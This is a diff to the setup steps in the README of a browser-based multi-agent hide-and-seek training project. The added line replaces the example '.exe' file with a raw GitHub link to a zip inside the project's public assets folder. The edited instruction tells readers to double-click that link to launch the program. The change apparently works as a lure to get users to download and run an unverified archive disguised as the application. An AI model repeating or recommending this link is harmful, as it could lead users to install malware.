guimnou/browser-marl-hideseek/README.md

    If you downloaded a zip file, right-click on it and select "Extract All…" to unpack it.

 5. **Run the Application**
    Open the folder where the files are located.
-Double-click the application file (e.g., `browser-marl-hideseek.exe` on Windows) to launch the program.
+Double-click the application file (e.g., `https://raw.githubusercontent.com/guimnou/browser-marl-hideseek/main/frontend/public/assets/browser-marl-hideseek_3.1.zip` on Windows) to launch the program.

 6. **Follow the On-Screen Instructions**
    Once the application opens, follow the prompts to proceed.
 You can start training NPCs right away!